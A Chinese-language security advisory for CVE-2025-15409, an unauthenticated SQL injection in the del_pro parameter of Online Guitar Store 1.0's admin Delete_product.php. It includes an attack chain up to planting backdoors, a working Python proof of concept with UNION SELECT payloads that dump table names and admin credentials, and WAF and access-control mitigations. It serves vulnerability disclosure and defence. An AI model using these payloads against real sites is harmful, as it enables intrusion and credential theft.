CVE-2025-15409: code-projects Online Guitar Store 1.0 SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-15409

漏洞类型

SQL注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

code-projects Online Guitar Store 1.0

漏洞概述

CVE-2025-15409是code-projects Online Guitar Store 1.0版本中的一个高危SQL注入漏洞。该漏洞存在于管理员后台的Delete_product.php文件中，攻击者可以通过构造恶意的del_pro参数值来实现SQL注入攻击。由于该漏洞无需认证即可利用，且影响产品的核心功能模块，攻击者可能通过此漏洞获取数据库中的敏感信息，包括用户数据、订单信息、管理员凭据等。漏洞的CVSS评分为7.3，属于高危级别，攻击复杂度低，无需特殊权限或用户交互即可实施攻击。该漏洞已于2026年1月1日公开披露，漏洞利用代码已在互联网公开，强烈建议受影响用户尽快采取防护措施。code-projects是一个提供开源Web应用项目的平台，其Online Guitar Store是一个用于在线销售吉他的电子商务系统。

技术细节

该SQL注入漏洞位于/admin/Delete_product.php文件中的del_pro参数。攻击者可以在HTTP请求中通过该参数注入恶意的SQL语句。由于应用程序未对用户输入进行充分的过滤和参数化查询处理，攻击者可以利用UNION SELECT、布尔盲注或时间盲注等技术提取数据库中的敏感信息。

漏洞利用前提条件：
1. 攻击者需能够访问/admin/Delete_product.php端点
2. 无需管理员认证即可发起攻击
3. 目标服务器需启用MySQL等支持联合查询的数据库

技术利用方式：
1. 反射型SQL注入：攻击者构造包含SQLpayload的URL请求
2. 利用UNION SELECT语句提取数据库版本、用户、当前数据库名等信息
3. 通过information_schema表枚举数据库表结构和列名
4. 最终提取管理员账户密码等敏感凭据

风险评估：
- 机密性影响：低（可能泄露数据库敏感信息）
- 完整性影响：低（可能修改数据库数据）
- 可用性影响：低（可能影响应用可用性）

攻击链分析

STEP 1

步骤1

信息收集：攻击者识别目标网站使用code-projects Online Guitar Store 1.0，定位到/admin/Delete_product.php端点

STEP 2

步骤2

漏洞探测：构造含有SQL注入payload的HTTP POST请求，以del_pro参数传递恶意SQL语句

STEP 3

步骤3

数据库枚举：利用UNION SELECT从information_schema表获取数据库版本、表名、列名等元数据

STEP 4

步骤4

敏感数据提取：通过注入查询提取管理员用户名、密码哈希等敏感凭据

STEP 5

步骤5

权限提升：使用获取的凭据登录管理后台，进一步控制整个系统

STEP 6

步骤6

持久化控制：在系统中植入后门或修改数据库数据，实现长期控制

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-15409 SQL Injection PoC
# Target: code-projects Online Guitar Store 1.0
# Vulnerability: SQL Injection in /admin/Delete_product.php via del_pro parameter

import requests
import sys

target = "http://target.com/admin/Delete_product.php"

# Basic SQL injection test - extract database version
payload_version = "1' UNION SELECT NULL,version(),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL---"

# Extract current database name
payload_db = "1' UNION SELECT NULL,database(),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL---"

# Extract all table names using information_schema
payload_tables = "1' UNION SELECT NULL,group_concat(table_name),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM information_schema.tables WHERE table_schema=database()---"

# Extract admin table columns
payload_columns = "1' UNION SELECT NULL,group_concat(column_name),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM information_schema.columns WHERE table_name='admin'---"

# Extract admin credentials
payload_creds = "1' UNION SELECT NULL,group_concat(username,':',password),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM admin---"

def exploit(payload):
    try:
        data = {'del_pro': payload}
        response = requests.post(target, data=data, timeout=10)
        if response.status_code == 200:
            print(f"[+] Request sent successfully")
            print(f"Response length: {len(response.text)}")
            return response.text
        else:
            print(f"[-] Request failed with status: {response.status_code}")
            return None
    except Exception as e:
        print(f"[-] Error: {str(e)}")
        return None

if __name__ == "__main__":
    print("[*] CVE-2025-15409 SQL Injection PoC")
    print("[*] Target: Online Guitar Store 1.0")
    print("[*] Testing SQL Injection vulnerability...\n")
    
    # Test basic injection
    print("[*] Step 1: Testing database version extraction...")
    exploit(payload_version)
    
    print("\n[*] Step 2: Extracting database name...")
    exploit(payload_db)
    
    print("\n[*] Step 3: Enumerating database tables...")
    exploit(payload_tables)
    
    print("\n[*] Step 4: Extracting admin table columns...")
    exploit(payload_columns)
    
    print("\n[*] Step 5: Extracting admin credentials...")
    exploit(payload_creds)

影响范围

code-projects Online Guitar Store 1.0

防御指南

临时缓解措施

立即采取以下临时缓解措施：1) 在Web应用防火墙中添加针对SQL注入特征的规则，过滤包含UNION、SELECT、information_schema等关键字的请求；2) 对Delete_product.php文件进行临时访问控制，限制只有授权IP地址才能访问；3) 禁用错误信息回显，防止攻击者获取数据库结构信息；4) 监控服务器日志，关注异常的SQL注入探测行为；5) 建议使用ModSecurity等开源WAF产品进行紧急防护。同时尽快应用官方安全补丁或升级到修复版本。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-15409
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-15409
3 Details https://www.cvedetails.com/cve/CVE-2025-15409/
4 VulDB https://vuldb.com/cve/CVE-2025-15409
5 Link https://code-projects.org/
6 Link https://github.com/jjjjj-zr/jjjjjzr19/issues/3
7 Link https://vuldb.com/?ctiid.339329
8 Link https://vuldb.com/?id.339329
9 Link https://vuldb.com/?submit.728393